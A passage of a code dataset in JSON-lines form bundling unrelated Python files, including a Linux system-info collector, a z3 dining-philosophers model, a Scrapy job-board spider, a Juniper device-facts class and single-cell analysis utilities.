\").upper()\n self.extra = extra\n #asks the user for a date in MM/DD/YYYY Format\n def get_date(self):\n clearscreen()\n self.date = False\n while self.date == False:\n try:\n date = input(\"Please enter the date of task(MM/DD/YYYY): \")\n self.date = datetime.strptime(date, '%m/%d/%Y')\n except ValueError:\n clearscreen()\n print('Oops, Please Enter In Month(08), Day(04), Year(1990) Format!')\n time.sleep(2)\n #A really clean way of printing each task all at once\n def taskprinter(self):\n print(\"---------------------\")\n print('Task Name: ' + self.name)\n print('Task Date: ' + self.date.strftime('%m/%d/%Y'))\n print('Time Taken: ' + self.time + \" Minutes\")\n print('Extra: ' + self.extra)\n print(\"---------------------\")\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"585944606","text":"##############################################################################\r\n# Copyright (c) 2016 by Patrick Kutch https://github.com/PatrickKutch\r\n# \r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n# \r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n# \r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n##############################################################################\r\n# File Abstract: \r\n# Gets some system information\r\n##############################################################################\r\n\r\nimport platform\r\nimport os\r\nfrom collections import namedtuple\r\nimport multiprocessing\r\n\r\ndef GetPlatform():\r\n return platform.uname()[0]\r\n\r\ndef GetRelease():\r\n return platform.release()\r\n\r\ndef GetLinuxDistro():\r\n return str(platform.linux_distribution()[0] + \" \" + platform.linux_distribution()[1])\r\n\r\ndef GetCPUInfo_Model_Linux():\r\n retStr = os.linesep\r\n CPU = 0\r\n with open('/proc/cpuinfo') as f:\r\n for line in f:\r\n # Ignore the blank line separating the information between\r\n # details about two processing units\r\n if line.strip():\r\n if line.rstrip('\\n').startswith('model name'):\r\n model_name = line.rstrip('\\n').split(':')[1]\r\n return \"CPU.Model=\"+model_name.strip() + os.linesep\r\n return retStr\r\n\r\ndef GetCoreCount():\r\n return str(multiprocessing.cpu_count())\r\n\r\ndef GetMemoryInfo_Linux(item):\r\n retStr = \"\"\r\n with open('/proc/meminfo') as f:\r\n for line in f:\r\n data = line.split(':')\r\n if item == data[0]:\r\n return data[1].strip() + os.linesep\r\n return item + \"=Invalid Item\"\r\n\r\ndef __GetNetDevices_Linux():\r\n ''' RX and TX bytes for each of the network devices '''\r\n\r\n with open('/proc/net/dev') as f:\r\n net_dump = f.readlines()\r\n \r\n device_data={}\r\n data = namedtuple('data',['rx','tx'])\r\n for line in net_dump[2:]:\r\n line = line.split(':')\r\n if line[0].strip() != 'lo':\r\n device_data[line[0].strip()] = data(float(line[1].split()[0])/(1024.0*1024.0), \r\n float(line[1].split()[8])/(1024.0*1024.0))\r\n \r\n return device_data\r\n \r\n\r\ndef GetNetDevices_Linux():\r\n netdevs = __GetNetDevices_Linux()\r\n retStr = \"\"\r\n for dev in netdevs.keys():\r\n retStr += dev +\".txRate=\"+str(netdevs[dev].tx) + os.linesep\r\n retStr += dev +\".rxRate=\"+str(netdevs[dev].rx) + os.linesep\r\n retStr += dev +\".bxRate=\"+str(netdevs[dev].rx + netdevs[dev].rx) + os.linesep\r\n\r\n return retStr\r\n\r\ndef GetSystemInfo_Linux(outputFile):\r\n data = \"Platform=\"+GetPlatform() + os.linesep\r\n data += \"Distro=\" + GetLinuxDistro() + os.linesep\r\n data += GetCPUInfo_Model_Linux()\r\n data += \"Memory.Total=\" + GetMemoryInfo_Linux(\"MemTotal\") + os.linesep\r\n data += \"Memory.Free=\" + GetMemoryInfo_Linux(\"MemFree\") + os.linesep\r\n data += GetNetDevices_Linux()\r\n data += \"CoreCount=\" + GetCoreCount() + os.linesep\r\n\r\n\r\n file = open(outputFile,\"wt\")\r\n file.write(data)\r\n file.close()\r\n return \"HelenKeller\" # don't want to send anything\r\n\r\nGetSystemInfo_Linux(\"sysinfo.txt\") \r\n\r\n\r\n\r\n\r\n","sub_path":"Minion/Collectors/SystemInfo_Linux.py","file_name":"SystemInfo_Linux.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"121468501","text":"########################################\r\n### define all events and finite sets\r\n########################################\r\n\r\nfrom z3 import *\r\nfrom finite_set import *\r\n\r\n#Channe, (a,b,c,d) = EnumSort('Channe', ('a','b','c','d'))\r\n\r\nN = 3\r\n\r\n## declare channels and (compounded) events\r\n\r\nChannel, (pickup, putdown) = EnumSort('Channel', ('pickup', 'putdown'))\r\n\r\nEvent = Datatype('Event')\r\nEvent.declare('CE', ('channel', Channel), ('phil', IntSort()), ('fork', IntSort()))\r\nEvent = Event.create()\r\n\r\nCE = Event.CE\r\n#channel = Event.channel\r\nphil = Event.phil\r\nneigh = Event.neigh\r\n\r\n\r\n\r\n\r\n## declare finite sets\r\nAllEvents = list(set([CE(pickup,i,i) for i in range(N)] + [CE(pickup,i,(i+1)%N) for i in range(N)] + [CE(pickup,(i-1)%N,i) for i in range(N)])) +\\\r\n list(set([CE(putdown,i,i) for i in range(N)] + [CE(putdown,i,(i+1)%N) for i in range(N)] + [CE(putdown,(i-1)%N,i) for i in range(N)]))\r\n\r\n#print AllEvents\r\n\r\nSetSort = FSetSort(AllEvents)\r\nSet = FSetDecl(AllEvents)\r\nFullset = Set.fullset()\r\n\r\n\r\n\r\n","sub_path":"examples/dining philosopher/event_philosophers.py","file_name":"event_philosophers.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"286594781","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a NGSRU spider created on top of the ATSSpider\n scrapy crawl ngs_ru -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://rabota.ngs.ru/vacancy?q=&rubric%5B%5D=\"\n\n sample job url:\n http://rabota.ngs.ru/vacancy/Voditel_taksi_plan_ot_1000_r?id=49034325\n\"\"\"\n\nfrom json import loads as json_loads\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix\n\n\nclass NGSRU(ATSSpider):\n\n name = \"ngs_ru\"\n disable_default_field_extractors = True\n City_Id = compile(r\"city = (\\d+)\")\n Ref_Num = compile(r\"\\?id=(\\d+)\")\n cur_offset = 0\n download_delay = 0.3\n\n def parse(self, response):\n selector = Selector(response)\n if not self.expected_job_count_set:\n job_count = selector.xpath(\n '//a[text()=\"%s\"]/following-sibling::span[@class=\"count\"]/text()' % unicode('Вакансии', 'utf-8')\n ).extract()\n if job_count:\n self.expected_job_count = job_count\n\n jobs = selector.xpath(\n '//div[@class=\"ra-elements-container\"]/ul[@class=\"ra-elements-list-hidden\"]/li'\n )\n for job in jobs:\n url = job.xpath(\n './/a[contains(@href, \"/vacancy/\")]/@href').extract()\n if url:\n job_url = urljoin(response.url, url[0])\n meta = {\n 'title': job.xpath(\n '..//a[contains(@href, \"/vacancy/\")]/h3/text()'\n ).extract(),\n 'company': job.xpath(\n './/a[contains(@href, \"/company/\")]/text()'\n ).extract(),\n 'url': job_url,\n }\n yield Request(\n callback=self.parse_jobdetails_redirect,\n meta=meta,\n url=job_url\n )\n\n if self.expected_job_count and self.cur_offset == 0:\n tot_pages = int(self.expected_job_count[0].replace(' ', '')) // 10\n for i in xrange(2, tot_pages, 1):\n self.cur_offset += 10\n yield Request(\n callback=self.parse,\n url=urljoin(\n response.url,\n '/vacancy?limit=10&offset=%s' % self.cur_offset\n )\n )\n\n def parse_jobdetails_redirect(self, response):\n city_id = self.City_Id.search(response.body)\n ref_num = self.Ref_Num.search(response.url)\n if city_id and ref_num:\n job_url = urljoin(\n response.url,\n '/api/v1/vacancies/%s/?city_id=%s' % (\n ref_num.group(1), city_id.group(1)\n )\n )\n response.meta['ref_num'] = ref_num.group(1)\n yield Request(\n callback=self.parse_job_callback(),\n meta=response.meta,\n url=job_url\n )\n\n def parse_job(self, response):\n data = json_loads(response.body)\n vacancies = data.get('vacancies', [])\n if vacancies:\n vacancy = vacancies[0]\n loader = BrightcorpItemLoader(selector=vacancy)\n\n loader.add_value('baseSalary', vacancy.get('salary', ''))\n loader.add_value('description', vacancy.get('description', ''))\n\n if vacancy.get('working_type', {}):\n loader.add_value(\n 'jobtype', vacancy.get('working_type', {}).get('title', '')\n )\n\n if vacancy.get('contact', {}):\n loader.add_value(\n 'location', vacancy.get('contact', {}).get('address', '')\n )\n\n if vacancy.get('experience_length', {}):\n loader.add_value(\n 'experiencerequirements',\n vacancy.get('experience_length', {}).get('title', '')\n )\n\n loader.add_value(\n 'referencenumber', response.meta.get('ref_num'),\n Prefix('%s-' % self.name)\n )\n loader.add_value('company', response.meta.get('company'))\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.meta.get('url'))\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/ngs_ru.py","file_name":"ngs_ru.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"35134743","text":"import pygame\n\nMAX_POP = 500\nMALE_MOVEMENT = 5\nMALE_SPREAD = 10\nFEMALE_SPREAD = 20\n\nbase = {\n \"WIDTH\":600 ,\n \"HEIGHT\": 600,\n \"OUTPUT_WIDTH\": 0,\n \"PLANT_AREA_WIDTH\": 0,\n \"FINAL_WIDTH\": 0,\n \"FPS\": 25,\n \"WHITE\": (255, 255, 255),\n \"BLACK\": (0, 0, 0),\n \"RED\": (255, 0, 0),\n \"BLUE\": (0, 0, 255),\n \"YELLOW\": (255, 255, 0),\n \"GREEN\": (0, 255, 0),\n \"P_HEIGHT\": 8,\n \"P_WIDTH\": 8,\n \"SEX\": ('M', 'F'),\n \"max_pop\": MAX_POP,\n \"start_pop\": int(MAX_POP * .75),\n}\n\nEND_BACK = pygame.Rect(0, 0, base['HEIGHT'], base['FINAL_WIDTH'])\n\np1 = [('A', 'A'), ('B', 'B'), ('C', 'C')] #, ('D', 'd') , ('E', 'e'), ('F', 'f')]\np2 = [('A', 'a'), ('B', 'b'), ('C', 'c')] #, ('D', 'D')] # , ('E', 'e')]#, ('F', 'f')]\n\nparents = [p1, p2]\n\nphenotypes = {\"dom\": {\n \"A\": \"Tall\",\n \"B\": \"Broad Leaf\",\n \"C\": \"Citrus\",\n \"D\": \"Green\",\n \"E\": \"Pine\",\n \"F\": \"THC\"\n},\n \"res\": {\n \"a\": \"Short\",\n \"b\": \"Narrow Leaf\",\n \"c\": \"Earthy\",\n \"d\": \"Purple\",\n \"e\": \"Fuel\",\n \"f\": \"CBD\"\n },\n \"codom\": {\n \"BB\": {\"life_exp\": 1.2},\n \"AA\": {\"life_exp\": 2},\n \"aa\": {\"life_exp\": 1},\n \"bb\": {\"life_exp\": 1},\n \"aA\": {\"life_exp\": 1},\n \"bB\": {\"life_exp\": 1},\n \"Aa\": {\"life_exp\": 1},\n \"Bb\": {\"life_exp\": 1},\n },\n \"linked\": {\n \"AA\": {\"height\": 2},\n \"aa\": {\"height\": 1},\n \"bb\": {\"width\": 1},\n \"BB\": {\"width\": 3},\n }\n}\n\nevent_triggers = {\n \"pop_trigger1\": .9,\n \"pop_trigger2\": .25,\n \"pop_trigger3\": .1,\n}\n\nplant_details = {\n 'm_life_min': 100,\n 'm_life_max': 600,\n\n 'min_males': MAX_POP * .05,\n 'male_movement': MALE_MOVEMENT,\n 'male_movement_min': MALE_MOVEMENT * -1,\n\n 'male_spread': MALE_SPREAD,\n 'male_spread_min': MALE_SPREAD * -1,\n\n 'f_life_min': 60000,\n 'f_life_max': 70000,\n 'mm_age': 9000,\n\n 'female_spread': FEMALE_SPREAD,\n 'female_spread_min': FEMALE_SPREAD * -1,\n\n 'max_pollination': 150,\n 'death': 0,\n\n 'mutation_point': 50,\n\n}\n\n# Leave these alone\nmutation_count = 0\ntotal_males = 0\ntotal_females = 0\nmax_gen = [0]\nmax_mom_age = [0]","sub_path":"Life Simulator/gen_settings.py","file_name":"gen_settings.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"136282073","text":"\"\"\"\nFacts module to gather system facts\n\"\"\"\nimport logging\nimport re\nfrom jnpr.junos.device import Device as Pyez_Device\nfrom jnpr.toby.hldcl.host import Host\nfrom jnpr.toby.exception.toby_exception import TobyException, TobyConnectFail\n\nclass DeviceData(Host):\n \"\"\"\n Facts class to gather device details\n \"\"\"\n def __init__(self, *args, **kwargs):\n # Check if host is provided\n if 'host' not in kwargs:\n raise TobyException(\"'host' is mandatory\")\n kwargs['os'] = kwargs.get('os', 'JUNOS')\n\n # Connect to given hostname/\n self.reg = None\n self.node_name = None\n self._kwargs = kwargs\n self.host = kwargs['host']\n self.handle = self._connect()\n self.model = self.get_model()\n mat = re.search(r'(\\D+)\\d*', self.model, re.I)\n if mat:\n self.series = mat.group(1).upper()\n else:\n raise TobyException('Could not determine model')\n\n def _get_credentials(self):\n \"\"\"\n Populates self.user and self.password based on user inputs. If user\n has not provided then try to get them from default credentials. Else\n raise an exception.\n\n :param kwargs: Keyword arguments provided by the user to create a\n device object\n\n :return: Tuple containing username and password\n \"\"\"\n # Check if user and password are passed arguments\n if not self._kwargs.get('user') or not self._kwargs.get('password'):\n from jnpr.toby.frameworkDefaults.credentials import JUNOS\n # Check if default credentials are available\n if not JUNOS['USERNAME'] or not JUNOS['PASSWORD']:\n raise TobyException(\"Username/Password cannot be determined\")\n return JUNOS['USERNAME'], JUNOS['PASSWORD']\n return self._kwargs['user'], self._kwargs['password']\n\n def _connect(self):\n # Default connect_mode to ssh\n connect_mode = self._kwargs.get('connect_mode', 'ssh').lower()\n # Check for valid connect modes\n if connect_mode not in ('telnet', 'ssh', 'console', 'netconf'):\n raise TobyException(\n 'Invalid connect mode({0}) specified. Connect mode can be '\n 'telnet/ssh/console/netconf'.format(connect_mode)\n )\n handle = None\n try:\n user, password = self._get_credentials()\n device_args = {'host': self._kwargs['host'], 'user': user,\n 'passwd': password, 'gather_facts': False}\n if connect_mode == 'ssh':\n device_args['port'] = 22\n if connect_mode == 'telnet' or connect_mode == 'console':\n device_args['mode'] = 'telnet'\n if 'pyez_port' in self._kwargs and self._kwargs['pyez_port'] is not None:\n device_args['port'] = int(self._kwargs['pyez_port'])\n handle = Pyez_Device(**device_args)\n handle.open()\n except Exception as exp:\n t.log(level=\"DEBUG\", message=\"Could not connect to device \" + self._kwargs['host'] + \":\" + str(exp))\n raise TobyConnectFail(\"Could not connect to device \" + self._kwargs['host'] + \":\" + str(exp))\n return handle\n\n def _get_juniper_node_facts(self):\n # Populate common properties\n facts_list = self._get_juniper_details()\n self.reg = facts_list[1]\n devip = self._get_host_ip(re_name=self.reg)\n is_dual_re = facts_list[0]\n hostname = facts_list[2]\n model = facts_list[3]\n devos = facts_list[4]\n facts_re = {'name': hostname, 'mgt-ip': devip, 'model': model, 'osname': devos}\n facts_node = {'controllers': {self.reg: facts_re}}\n\n if is_dual_re:\n other_re = facts_list[5]\n other_re_ip = self._get_host_ip(re_name=other_re)\n other_re_hostname = facts_list[6]\n other_re_model = facts_list[7]\n other_re_os = facts_list[8]\n facts_re = {'name': other_re_hostname, 'mgt-ip': other_re_ip,\n 'model': other_re_model, 'osname': other_re_os}\n facts_node['controllers'][other_re] = facts_re\n\n facts_node['osname'] = facts_node['controllers']['re0']['osname']\n facts_node['model'] = facts_node['controllers']['re0']['model']\n return facts_node\n\n def _get_srx_facts(self):\n self.reg = 're0'\n facts_list = self._get_srx_details()\n is_ha = facts_list[0]\n node_name = facts_list[1]\n if node_name == 'node0':\n self.node_name = 'primary'\n elif node_name == 'node1':\n self.node_name = 'slave'\n hostname = facts_list[2]\n model = facts_list[3]\n devos = facts_list[4]\n if is_ha:\n devip = self._get_host_ip_srx(node=self.node_name)\n else:\n devip = self._get_host_ip_srx(node=self.reg)\n facts_re = {'name': hostname, 'mgt-ip': devip, 'model': model, 'osname': devos}\n facts_node = {'controllers': {self.reg: facts_re}}\n facts_system = {self.node_name: facts_node}\n facts_system['primary']['osname'] = facts_system['primary']['controllers']['re0']['osname']\n facts_system['primary']['model'] = facts_system['primary']['controllers']['re0']['model']\n facts_system['primary']['name'] = facts_system['primary']['controllers']['re0']['name']\n facts_system['primary']['mgt-ip'] = facts_system['primary']['controllers']['re0']['mgt-ip']\n if is_ha:\n other_node_re = 're0'\n other_node_name = self._other_node_name()\n other_node_ip = self._get_host_ip_srx(node=other_node_name)\n other_node_hostname = facts_list[6]\n other_node_model = facts_list[7]\n other_node_os = facts_list[8]\n facts_re = {'name': other_node_hostname, 'mgt-ip': other_node_ip,\n 'model': other_node_model, 'osname': other_node_os}\n facts_node = {'controllers': {other_node_re: facts_re}}\n facts_system[other_node_name] = facts_node\n facts_system['slave']['osname'] = facts_system['slave']['controllers']['re0']['osname']\n facts_system['slave']['model'] = facts_system['slave']['controllers']['re0']['model']\n facts_system['slave']['name'] = facts_system['slave']['controllers']['re0']['name']\n facts_system['slave']['mgt-ip'] = facts_system['slave']['controllers']['re0']['mgt-ip']\n return facts_system\n\n def _get_juniper_details(self):\n response = self.handle.cli(command='show version invoke-on all-routing-engines',\n format='xml', warning=False)\n try:\n multi_re = response.findall('multi-routing-engine-item')\n except:\n raise TobyException('Could not connect to the other RE.')\n if len(multi_re) > 0:\n re_name0 = multi_re[0].find('re-name').text\n model0 = multi_re[0].find('software-information/product-model').text\n host_name0 = multi_re[0].find('software-information/host-name').text\n os_list = multi_re[0].findall('software-information/package-information')\n os0 = 'junos'\n try:\n re_name1 = multi_re[1].find('re-name').text\n model1 = multi_re[1].find('software-information/product-model').text\n host_name1 = multi_re[1].find('software-information/host-name').text\n os_list1 = multi_re[1].findall('software-information/package-information')\n os1 = 'junos'\n dual_re = True\n except:\n re_name1 = None\n model1 = None\n host_name1 = None\n os1 = None\n dual_re = False\n facts_list = [dual_re, re_name0, host_name0, model0, os0, re_name1, host_name1,\n model1, os1]\n else:\n try:\n if 're-name' in response:\n re_name = response.find('re-name').text\n else:\n re_name = 're0'\n model = response.find('product-model').text\n host_name = response.find('host-name').text\n os_list = response.findall('package-information')\n devos = os_list[0].find('name').text\n facts_list = [False, re_name, host_name, model, devos, None, None, None, None]\n except:\n raise TobyException('Could not retrieve details')\n return facts_list\n\n def _get_srx_details(self):\n response = self.handle.cli(command='show version', format='xml', warning=False)\n multi_re = response.findall('multi-routing-engine-item')\n if len(multi_re) > 0:\n node_name0 = multi_re[0].find('re-name').text\n model0 = multi_re[0].find('software-information/product-model').text\n host_name0 = multi_re[0].find('software-information/host-name').text\n os_list = multi_re[0].findall('software-information/package-information')\n os0 = os_list[0].find('name').text\n node_name1 = multi_re[1].find('re-name').text\n model1 = multi_re[1].find('software-information/product-model').text\n host_name1 = multi_re[1].find('software-information/host-name').text\n os_list1 = multi_re[1].findall('software-information/package-information')\n os1 = os_list1[0].find('name').text\n dual_re = True\n facts_list = [dual_re, node_name0, host_name0, model0, os0, node_name1,\n host_name1, model1, os1]\n else:\n try:\n node_name = 'node0'\n model = response.find('product-model').text\n host_name = response.find('host-name').text\n os_list = response.findall('package-information')\n devos = os_list[0].find('name').text\n facts_list = [False, node_name, host_name, model, devos, None, None, None, None]\n except:\n raise TobyException('Could not retrieve details')\n return facts_list\n\n def get_model(self):\n \"\"\"\n Returns model of the device\n \"\"\"\n version = self.handle.rpc.get_software_information()\n multi_re = version.findall('multi-routing-engine-item')\n if len(multi_re) > 0:\n model = multi_re[0].find('software-information/product-model').text\n if re.search(r'MX\\d+', model, re.I):\n return 'MX'\n elif re.search(r'VSRX', model, re.I):\n return 'VSRX'\n elif re.search(r'SRX\\d+', model, re.I):\n return 'SRX'\n elif re.search(r'ex\\d+', model, re.I):\n return 'EX'\n elif re.search(r'qfx\\d+', model, re.I):\n return 'QFX'\n elif re.search(r'ocx\\d+', model, re.I):\n return 'OCX'\n elif re.search(r'nfx\\d+', model, re.I):\n return 'NFX'\n else:\n return model\n try:\n model = version.find('product-model').text\n except:\n raise TobyException('Could not retrieve model')\n return model\n\n def _other_re_slot_name(self):\n \"\"\"\n Other RE name\n :return: Return other RE name\n \"\"\"\n other_re = None\n if self.reg == 're0':\n other_re = 're1'\n elif self.reg == 're1':\n other_re = 're0'\n return other_re\n\n def _other_node_name(self):\n \"\"\"\n Other Node name\n :return: Return other Node name\n \"\"\"\n other_node = None\n if self.node_name == 'primary':\n other_node = 'slave'\n elif self.node_name == 'slave':\n other_node = 'primary'\n return other_node\n\n def _get_host_ip(self, re_name):\n \"\"\"\n Get the management IP of RE\n\n :param re_name: Name of RE whose management IP needs to be retrieved\n :return: Management IP address. Raises exception in case of failure.\n \"\"\"\n re_name = re_name.lower()\n host_ip = None\n response1 = self.handle.rpc.get_configuration({'database': 'committed'})\n response = response1.findall('groups[name=\"{0}\"]'.format(re_name))\n if len(response) == 0:\n response = response1.findall('groups[name=\"{0}\"]'.format('member0'))\n em0_data = response[0].find('interfaces/interface[name=\"em0\"]')\n if em0_data is not None:\n host_ip = em0_data.find('unit/family/inet/address/name').text\n else:\n fxp0_data = response[0].find('interfaces/interface[name=\"fxp0\"]')\n if fxp0_data is not None:\n host_ip = fxp0_data.find('unit/family/inet/address/name').text\n if not host_ip:\n raise TobyException('Could not determined other RE management IP')\n #host_ip = host_ip.split('/')[0]\n return host_ip\n\n def _get_host_ip_srx(self, node):\n \"\"\"\n Get the management IP of chassis\n\n :param re_name: Name of RE whose management IP needs to be retrieved\n :param node: Name of the srx node('node0'/'node1')\n :return: Management IP address. Raises exception in case of failure.\n \"\"\"\n response = self.handle.rpc.get_configuration(\n {'database': 'committed'}\n )\n if node == 'primary':\n node = 'node0'\n elif node == 'slave':\n node = 'node1'\n response = response.findall('groups[name=\"{0}\"]'.format(node))\n fxp0_data = response[0].find('interfaces/interface[name=\"fxp0\"]')\n if fxp0_data is not None:\n host_ip = fxp0_data.find('unit/family/inet/address/name').text\n if not host_ip:\n raise TobyException('Could not determined management IP')\n #host_ip = host_ip.split('/')[0]\n return host_ip\n\n def system_facts(self):\n \"\"\"\n Returns systems facts dictionary\n \"\"\"\n if self.series in ('SRX', 'VSRX'):\n response = self._get_srx_facts()\n else:\n node_info = self._get_juniper_node_facts()\n response = {'primary': node_info}\n from pprint import pprint\n pprint(response)\n return response\n\n def pyez_facts(self):\n \"\"\"\n Returns pyEZ handle facts\n \"\"\"\n self.handle.facts_refresh()\n return self.handle.facts\n\n def close(self):\n \"\"\"\n Close the connection\n \"\"\"\n self.handle.close()\n return True\n","sub_path":"NITA/lib/jnpr/toby/hldcl/device_data.py","file_name":"device_data.py","file_ext":"py","file_size_in_byte":14610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"140646405","text":"from anndata import read_h5ad\nimport sys\nfrom time import time\nfrom scipy import stats, sparse\nimport numpy as np\nimport collections\nimport pickle\nimport scipy\nfrom sklearn.preprocessing import normalize\nimport os\nfrom collections import Counter\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score,accuracy_score,precision_recall_fscore_support, cohen_kappa_score, auc, average_precision_score,f1_score,precision_recall_curve\nimport time\nimport psutil\nimport umap\nimport copy\nfrom sklearn import preprocessing\nfrom fbpca import pca\nfrom sklearn.metrics import roc_auc_score, roc_curve\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scanorama import VERBOSE, KNN, ALPHA, APPROX, SIGMA\n#from libs import *\nfrom scanorama import find_alignments,merge_datasets,process_data,transform,vstack\nfrom sklearn.utils.graph_shortest_path import graph_shortest_path\nfrom scipy.sparse.linalg import svds, eigs\n\ndef print_memory_usage(loc):\n\t\"\"\"\n\tReturns the CPU and RAM usage for the system. Takes a string argument to indicate where in the\n\tprogram the memory usage is being computed.\n\t\"\"\"\n\tprint(\"Memory info\", loc)\n\tprint(\"\\tCPU usage:\", psutil.cpu_percent(), \"%\")\n\tprint(\"\\tRAM usage:\", psutil.virtual_memory()[2], \"%\")\n\tprint(\"\\t\\tYou have\", psutil.virtual_memory()[1] / 1000000000.0, \"GB available out of\",\n\t\t\t\t\t\tpsutil.virtual_memory()[0] / 1000000000.0, \"GB total\")\n\tprint()\n\n\ndef pickle_these_objects(a, b, c, d, e, f, filename='my_pickle.pickle'):\n\t\"\"\"\n\tUtility class for quickly pickling objects (takes up to 6 objects)\n\t\"\"\"\n\tdata = [a, b, c, d, e, f]\n\twith open(filename, \"wb\") as f:\n\t\tpickle.dump(len(data), f)\n\t\tfor value in data:\n\t\t\tpickle.dump(value, f)\n\n\ndef unpickle_from_file(filename='my_pickle.pickle'):\n\t\"\"\"\n\tUtility class for quickly unpickling objects. Returns a tuple of all the unpickled objects\n\t\"\"\"\n\tdata = []\n\twith open(filename, \"rb\") as f:\n\t\tfor i in range(pickle.load(f)):\n\t\t\tdata.append(pickle.load(f))\n\treturn tuple(data)\n\n\nnn_nhidden = [1000]\nrsts = [0.5,0.6,0.7,0.8]\ndfs_depth = 1\nco_dim = 5\nkeep_prob = 1.0\nuse_diagonal = True\nmax_iter = 20\nniter = 5\ndef translate_paramter(ps):\n\ts = []\n\tfor p in ps:\n\t\tif isinstance(p, list):\n\t\t\tp = [str(i) for i in p]\n\t\t\tp = '.'.join(p)\n\t\t\ts.append(p)\n\t\telse:\n\t\t\ts.append(str(p))\n\ts = '_'.join(s)\n\treturn s\npname = translate_paramter([max_iter])\n\n\ndef make_folder(folder):\n\tif not os.path.exists(folder):\n\t\tos.makedirs(folder)\n\treturn folder\n\n\ndef create_propagate_networks(dname, l2i, onto_net, cls2cls, ontology_nlp_file, rsts = [0.5,0.6,0.7,0.8], diss=[2,3], thress=[1,0.8]):\n\tncls = np.shape(cls2cls)[0]\n\tif dname != 'allen':\n\t\tonto_net_nlp, onto_net_bin, stack_net_nlp, stack_net_bin, onto_net_nlp_all_pairs = create_nlp_networks(l2i, onto_net, cls2cls, ontology_nlp_file)\n\t\t#network = create_consensus_networks(rsts, stack_net_nlp, onto_net_nlp_all_pairs, cls2cls)\n\t\tnetwork = create_consensus_networks(rsts, stack_net_nlp, onto_net_nlp_all_pairs, cls2cls, diss = diss, thress = thress)\n\telse:\n\t\tstack_net_bin = np.zeros((ncls,ncls))\n\t\tfor n1 in onto_net:\n\t\t\tfor n2 in onto_net[n1]:\n\t\t\t\tif n1==n2:\n\t\t\t\t\tcontinue\n\t\t\t\tstack_net_bin[n1,n2] = 1\n\t\t\t\tstack_net_bin[n2,n1] = 1\n\t\tnetwork = [RandomWalkRestart(stack_net_bin, rst) for rst in rsts]\n\treturn network\n\n\ndef fine_nearest_co_using_nlp(sentences,co2emb,obo_file,nlp_mapping_cutoff=0.8):\n\tco2name, name2co = get_ontology_name(obo_file = obo_file)\n\tfrom sentence_transformers import SentenceTransformer\n\tmodel = SentenceTransformer('bert-base-nli-mean-tokens')\n\tsentences = np.array([sentence.lower() for sentence in sentences])\n\tsentence_embeddings = model.encode(sentences)\n\tco_embeddings = []\n\tcos = []\n\tfor co in co2emb:\n\t\tco_embeddings.append(co2emb[co])\n\t\tcos.append(co)\n\tco_embeddings = np.array(co_embeddings)\n\tsent2co = {}\n\tfor sentence, embedding, ind in zip(sentences, sentence_embeddings, range(len(sentences))):\n\t\tscs = cosine_similarity(co_embeddings, embedding.reshape(1,-1))\n\n\t\tco_id = np.argmax(scs)\n\t\tsc = scs[co_id]\n\t\tif sc>nlp_mapping_cutoff:\n\t\t\tsent2co[sentence.lower()] = cos[co_id]\n\t\t\tnames = set()\n\t\t\tfor name in name2co:\n\t\t\t\tif name2co[name].upper() == cos[co_id]:\n\t\t\t\t\tnames.add(name)\n\t\t\t#print (sentence, cos[co_id], sc, co2name[cos[co_id]],names)\n\treturn sent2co\n\n\ndef ImputeUnseenCls(y_vec, y_raw, cls2cls, nseen, knn=1):\n\tnclass = np.shape(cls2cls)[0]\n\tseen2unseen_sim = cls2cls[:nseen, nseen:]\n\tnngh = np.argsort(seen2unseen_sim*-1, axis = 0)[0,:]\n\tncell = len(y_vec)\n\ty_mat = np.zeros((ncell, nclass))\n\ty_mat[:,:nseen] = y_raw[:, :nseen]\n\tfor i in range(ncell):\n\t\tif y_vec[i] == -1:\n\t\t\t#kngh = np.argsort(y_raw[i,:nseen]*-1)[0:knn]\n\t\t\t#if len(kngh) == 0:\n\t\t\t#\tcontinue\n\t\t\ty_mat[i,nseen:] = y_mat[i,nngh]\n\t\t\ty_mat[i,:nseen] -= 1000000\n\treturn y_mat\n\n\ndef ImputeUnseenCls_Backup(y_vec, y_raw, cls2cls, nseen, knn=1):\n\tnclass = np.shape(cls2cls)[0]\n\tseen2unseen_sim = cls2cls[:nseen, nseen:]\n\tncell = len(y_vec)\n\ty_mat = np.zeros((ncell, nclass))\n\ty_mat[:,:nseen] = y_raw[:, :nseen]\n\tfor i in range(ncell):\n\t\tif y_vec[i] == -1:\n\t\t\tkngh = np.argsort(y_raw[i,:nseen]*-1)[0:knn]\n\t\t\tif len(kngh) == 0:\n\t\t\t\tcontinue\n\t\t\ty_mat[i,:nseen] -= 1000000\n\t\t\ty_mat[i,nseen:] = np.dot(y_raw[i,kngh], seen2unseen_sim[kngh,:])\n\treturn y_mat\n\n\ndef 